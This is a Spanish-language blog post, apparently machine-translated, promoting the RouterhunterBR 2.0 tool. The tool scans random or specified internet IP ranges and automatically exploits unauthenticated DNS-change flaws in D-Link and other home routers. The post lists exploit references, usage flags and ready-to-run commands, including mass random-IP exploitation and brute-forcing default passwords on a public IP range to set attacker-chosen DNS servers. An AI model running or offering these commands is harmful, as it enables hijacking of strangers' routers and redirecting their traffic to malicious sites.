Vistas de página en total

Mostrando entradas con la etiqueta RouterExploitation. Mostrar todas las entradas
Mostrando entradas con la etiqueta RouterExploitation. Mostrar todas las entradas

lunes, 15 de febrero de 2016

Routerhunterbr automático 2.0 herramienta para probar... #Linux #RouterExploitation #RouterhunterBR

 El RouterhunterBR Que es una herramienta de seguridad automatizada encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de pistas ips definidos o al azar con el fin de explotar de forma automática el DNSChanger la vulnerabilidad de los routers domésticos.
 
 El DNSChanger es un troyano capaz de dirigir peticiones de los usuarios a sitios ilegales. En la práctica, este malware tiene la capacidad de cambiar la configuración DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos. Imagínese, por ejemplo, que su sistema está infectado con este malware, lo que podría ocurrir es que el usuario tenga acceso a un sitio en particular (por ejemplo. Facebook.com) puede ser enviada a un sitio web no solicitados y potencialmente ilegal.
 
   El guión explora cuatro vulnerabilidades en los routers
 Tech traslado ADSL Modem-Router 915 WM / sin autenticar DNS remoto Cambio Exploitreference: http://www.exploit-db.com/exploits/35995/
 D-Link DSL-2740R / sin autenticar DNS remoto Cambio Exploitreference: http://www.exploit-db.com/exploits/35917/
 D-Link DSL-2640B sin autenticar DNS remoto Cambio Exploitreference: http://1337day.com/exploit/23302/
 D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
reference: https://www.exploit-db.com/exploits/37237/
 D-Link DSL-2730B AU_2.01 - omisión de autenticación de DNS Changereference: https://www.exploit-db.com/exploits/37240/
 D-Link DSL-526B ADSL2 AU_2.01 - No autenticado Changereference DNS remoto: https://www.exploit-db.com/exploits/37241/
 routers autenticados - - DSLink 260E DNS Changer - bruteforce de referencia: https://www.youtube.com/watch?v=tNjy91g2Rakhttp://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html
 

 requerimiento

import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime
 
 

Uso

 

-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip
 
 

 comandos

   ips al azar 

 

python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
 
   Escáner de IP gama: 
 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
 
   rango de IP para requisitos particulares con comodín / Ex: --startip 201 * * * - --endip 201 * * *...... 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
 
   La fuerza bruta con usuarios y contraseñas en los routers que requiere
 autenticación, obligando a la alteración de DNS - DSLink 260E.
 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
 
 
                              Download RouterhunterBR 2.0